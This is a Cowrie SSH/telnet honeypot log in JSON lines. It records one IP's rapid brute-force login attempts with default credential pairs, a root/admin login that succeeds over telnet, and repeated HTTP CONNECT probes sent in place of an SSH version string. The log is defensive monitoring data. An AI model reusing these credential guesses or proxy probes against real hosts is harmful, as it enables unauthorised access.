{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23202,"dst_ip":"1.2.3.4","dst_port":22,"session":"18fab91c8a36","protocol":"ssh","message":"New connection: 212.227.235.229:23202 (1.2.3.4:22) [session: 18fab91c8a36]","sensor":"my-vps","timestamp":"2025-08-28T22:29:29.792247Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:30.008863Z","src_ip":"212.227.235.229","session":"18fab91c8a36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23208,"dst_ip":"1.2.3.4","dst_port":22,"session":"7094098ffd20","protocol":"ssh","message":"New connection: 212.227.235.229:23208 (1.2.3.4:22) [session: 7094098ffd20]","sensor":"my-vps","timestamp":"2025-08-28T22:29:30.797127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:29:30.801524Z","src_ip":"212.227.235.229","session":"7094098ffd20"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:29:30.904770Z","src_ip":"212.227.235.229","session":"7094098ffd20"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T22:29:31.249266Z","src_ip":"212.227.235.229","session":"7094098ffd20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47866,"dst_ip":"1.2.3.4","dst_port":23,"session":"8defedff7f69","protocol":"telnet","message":"New connection: 212.227.235.229:47866 (1.2.3.4:23) [session: 8defedff7f69]","sensor":"my-vps","timestamp":"2025-08-28T22:29:34.587619Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:29:34.790816Z","src_ip":"212.227.235.229","session":"8defedff7f69"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:29:34.807702Z","src_ip":"212.227.235.229","session":"8defedff7f69"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:35.951241Z","src_ip":"212.227.235.229","session":"7094098ffd20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23214,"dst_ip":"1.2.3.4","dst_port":22,"session":"c19ce4affd62","protocol":"ssh","message":"New connection: 212.227.235.229:23214 (1.2.3.4:22) [session: c19ce4affd62]","sensor":"my-vps","timestamp":"2025-08-28T22:29:37.987347Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:38.565646Z","src_ip":"212.227.235.229","session":"c19ce4affd62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34776,"dst_ip":"1.2.3.4","dst_port":22,"session":"d01e2337dcc1","protocol":"ssh","message":"New connection: 212.227.235.229:34776 (1.2.3.4:22) [session: d01e2337dcc1]","sensor":"my-vps","timestamp":"2025-08-28T22:29:39.306891Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:39.698467Z","src_ip":"212.227.235.229","session":"d01e2337dcc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34782,"dst_ip":"1.2.3.4","dst_port":22,"session":"f110b3ab66d8","protocol":"ssh","message":"New connection: 212.227.235.229:34782 (1.2.3.4:22) [session: f110b3ab66d8]","sensor":"my-vps","timestamp":"2025-08-28T22:29:40.917929Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:41.206104Z","src_ip":"212.227.235.229","session":"f110b3ab66d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34788,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e2aa68d6b84","protocol":"ssh","message":"New connection: 212.227.235.229:34788 (1.2.3.4:22) [session: 7e2aa68d6b84]","sensor":"my-vps","timestamp":"2025-08-28T22:29:41.859869Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:42.109892Z","src_ip":"212.227.235.229","session":"7e2aa68d6b84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34804,"dst_ip":"1.2.3.4","dst_port":22,"session":"1079da644b0e","protocol":"ssh","message":"New connection: 212.227.235.229:34804 (1.2.3.4:22) [session: 1079da644b0e]","sensor":"my-vps","timestamp":"2025-08-28T22:29:42.979511Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:29:43.140424Z","src_ip":"212.227.235.229","session":"1079da644b0e"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:43.143021Z","src_ip":"212.227.235.229","session":"1079da644b0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34810,"dst_ip":"1.2.3.4","dst_port":22,"session":"81512afe5b3a","protocol":"ssh","message":"New connection: 212.227.235.229:34810 (1.2.3.4:22) [session: 81512afe5b3a]","sensor":"my-vps","timestamp":"2025-08-28T22:29:44.338060Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:44.583574Z","src_ip":"212.227.235.229","session":"81512afe5b3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34816,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3f843abf837","protocol":"ssh","message":"New connection: 212.227.235.229:34816 (1.2.3.4:22) [session: c3f843abf837]","sensor":"my-vps","timestamp":"2025-08-28T22:29:45.066332Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:45.463587Z","src_ip":"212.227.235.229","session":"c3f843abf837"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34822,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ff62fc9ad18","protocol":"ssh","message":"New connection: 212.227.235.229:34822 (1.2.3.4:22) [session: 2ff62fc9ad18]","sensor":"my-vps","timestamp":"2025-08-28T22:29:46.468473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:29:46.469362Z","src_ip":"212.227.235.229","session":"2ff62fc9ad18"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:29:46.571397Z","src_ip":"212.227.235.229","session":"2ff62fc9ad18"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T22:29:46.910327Z","src_ip":"212.227.235.229","session":"2ff62fc9ad18"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:48.098149Z","src_ip":"212.227.235.229","session":"2ff62fc9ad18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34828,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf4ae386e519","protocol":"ssh","message":"New connection: 212.227.235.229:34828 (1.2.3.4:22) [session: bf4ae386e519]","sensor":"my-vps","timestamp":"2025-08-28T22:29:49.015889Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:49.307125Z","src_ip":"212.227.235.229","session":"bf4ae386e519"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35682,"dst_ip":"1.2.3.4","dst_port":22,"session":"46ecde7ebcfe","protocol":"ssh","message":"New connection: 212.227.235.229:35682 (1.2.3.4:22) [session: 46ecde7ebcfe]","sensor":"my-vps","timestamp":"2025-08-28T22:29:50.600600Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:51.221828Z","src_ip":"212.227.235.229","session":"46ecde7ebcfe"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54582,"dst_ip":"1.2.3.4","dst_port":22,"session":"f53de395713a","protocol":"ssh","message":"New connection: 217.72.205.35:54582 (1.2.3.4:22) [session: f53de395713a]","sensor":"my-vps","timestamp":"2025-08-28T22:29:51.948565Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:51.949623Z","src_ip":"217.72.205.35","session":"f53de395713a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35690,"dst_ip":"1.2.3.4","dst_port":22,"session":"07eb48873ca6","protocol":"ssh","message":"New connection: 212.227.235.229:35690 (1.2.3.4:22) [session: 07eb48873ca6]","sensor":"my-vps","timestamp":"2025-08-28T22:29:52.310829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:29:52.311476Z","src_ip":"212.227.235.229","session":"07eb48873ca6"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:29:52.415191Z","src_ip":"212.227.235.229","session":"07eb48873ca6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P4ssw0rd","message":"login attempt [admin/P4ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T22:29:52.764158Z","src_ip":"212.227.235.229","session":"07eb48873ca6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:53.919620Z","src_ip":"212.227.235.229","session":"07eb48873ca6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35702,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cb09508bacf","protocol":"ssh","message":"New connection: 212.227.235.229:35702 (1.2.3.4:22) [session: 5cb09508bacf]","sensor":"my-vps","timestamp":"2025-08-28T22:29:54.486335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:29:54.487310Z","src_ip":"212.227.235.229","session":"5cb09508bacf"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:29:54.583306Z","src_ip":"212.227.235.229","session":"5cb09508bacf"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"DVdmEU8usfIYEiYD9txyX","message":"login attempt [ubnt/DVdmEU8usfIYEiYD9txyX] failed","sensor":"my-vps","timestamp":"2025-08-28T22:29:54.922820Z","src_ip":"212.227.235.229","session":"5cb09508bacf"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:56.091825Z","src_ip":"212.227.235.229","session":"5cb09508bacf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35712,"dst_ip":"1.2.3.4","dst_port":22,"session":"775f69bfeb03","protocol":"ssh","message":"New connection: 212.227.235.229:35712 (1.2.3.4:22) [session: 775f69bfeb03]","sensor":"my-vps","timestamp":"2025-08-28T22:29:57.281227Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:57.492516Z","src_ip":"212.227.235.229","session":"775f69bfeb03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35722,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb90ef53fa91","protocol":"ssh","message":"New connection: 212.227.235.229:35722 (1.2.3.4:22) [session: eb90ef53fa91]","sensor":"my-vps","timestamp":"2025-08-28T22:29:58.598073Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:29:58.817469Z","src_ip":"212.227.235.229","session":"eb90ef53fa91"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:58.818991Z","src_ip":"212.227.235.229","session":"eb90ef53fa91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32594,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef4d5a0f882e","protocol":"ssh","message":"New connection: 212.227.235.229:32594 (1.2.3.4:22) [session: ef4d5a0f882e]","sensor":"my-vps","timestamp":"2025-08-28T22:30:00.430750Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:30:00.634454Z","src_ip":"212.227.235.229","session":"ef4d5a0f882e"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:00.635689Z","src_ip":"212.227.235.229","session":"ef4d5a0f882e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32608,"dst_ip":"1.2.3.4","dst_port":22,"session":"918923de6dec","protocol":"ssh","message":"New connection: 212.227.235.229:32608 (1.2.3.4:22) [session: 918923de6dec]","sensor":"my-vps","timestamp":"2025-08-28T22:30:01.371006Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:01.674797Z","src_ip":"212.227.235.229","session":"918923de6dec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32614,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8e078dc0ccb","protocol":"ssh","message":"New connection: 212.227.235.229:32614 (1.2.3.4:22) [session: f8e078dc0ccb]","sensor":"my-vps","timestamp":"2025-08-28T22:30:02.694181Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:02.992282Z","src_ip":"212.227.235.229","session":"f8e078dc0ccb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32626,"dst_ip":"1.2.3.4","dst_port":22,"session":"2df079867174","protocol":"ssh","message":"New connection: 212.227.235.229:32626 (1.2.3.4:22) [session: 2df079867174]","sensor":"my-vps","timestamp":"2025-08-28T22:30:04.168851Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:04.431676Z","src_ip":"212.227.235.229","session":"2df079867174"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32640,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8c99a11d4c1","protocol":"ssh","message":"New connection: 212.227.235.229:32640 (1.2.3.4:22) [session: a8c99a11d4c1]","sensor":"my-vps","timestamp":"2025-08-28T22:30:05.162781Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:30:05.338616Z","src_ip":"212.227.235.229","session":"a8c99a11d4c1"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:05.339780Z","src_ip":"212.227.235.229","session":"a8c99a11d4c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32646,"dst_ip":"1.2.3.4","dst_port":22,"session":"3da2e7d88b21","protocol":"ssh","message":"New connection: 212.227.235.229:32646 (1.2.3.4:22) [session: 3da2e7d88b21]","sensor":"my-vps","timestamp":"2025-08-28T22:30:06.570188Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:06.841753Z","src_ip":"212.227.235.229","session":"3da2e7d88b21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32648,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a4432262636","protocol":"ssh","message":"New connection: 212.227.235.229:32648 (1.2.3.4:22) [session: 8a4432262636]","sensor":"my-vps","timestamp":"2025-08-28T22:30:08.151968Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:08.479149Z","src_ip":"212.227.235.229","session":"8a4432262636"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48802,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7a41a013162","protocol":"ssh","message":"New connection: 212.227.235.229:48802 (1.2.3.4:22) [session: b7a41a013162]","sensor":"my-vps","timestamp":"2025-08-28T22:30:09.842728Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:30:10.049783Z","src_ip":"212.227.235.229","session":"b7a41a013162"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:10.051101Z","src_ip":"212.227.235.229","session":"b7a41a013162"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48814,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4118f162dec","protocol":"ssh","message":"New connection: 212.227.235.229:48814 (1.2.3.4:22) [session: b4118f162dec]","sensor":"my-vps","timestamp":"2025-08-28T22:30:10.842993Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:11.088970Z","src_ip":"212.227.235.229","session":"b4118f162dec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48828,"dst_ip":"1.2.3.4","dst_port":22,"session":"4256f1aab1d4","protocol":"ssh","message":"New connection: 212.227.235.229:48828 (1.2.3.4:22) [session: 4256f1aab1d4]","sensor":"my-vps","timestamp":"2025-08-28T22:30:12.133937Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:12.386723Z","src_ip":"212.227.235.229","session":"4256f1aab1d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48844,"dst_ip":"1.2.3.4","dst_port":22,"session":"66d197e48bf4","protocol":"ssh","message":"New connection: 212.227.235.229:48844 (1.2.3.4:22) [session: 66d197e48bf4]","sensor":"my-vps","timestamp":"2025-08-28T22:30:13.646999Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:30:13.798541Z","src_ip":"212.227.235.229","session":"66d197e48bf4"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:13.800155Z","src_ip":"212.227.235.229","session":"66d197e48bf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48858,"dst_ip":"1.2.3.4","dst_port":22,"session":"c565752c956d","protocol":"ssh","message":"New connection: 212.227.235.229:48858 (1.2.3.4:22) [session: c565752c956d]","sensor":"my-vps","timestamp":"2025-08-28T22:30:14.651354Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:30:14.961699Z","src_ip":"212.227.235.229","session":"c565752c956d"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:14.963125Z","src_ip":"212.227.235.229","session":"c565752c956d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48862,"dst_ip":"1.2.3.4","dst_port":22,"session":"d90d5b3ee964","protocol":"ssh","message":"New connection: 212.227.235.229:48862 (1.2.3.4:22) [session: d90d5b3ee964]","sensor":"my-vps","timestamp":"2025-08-28T22:30:16.312426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:30:16.313119Z","src_ip":"212.227.235.229","session":"d90d5b3ee964"}
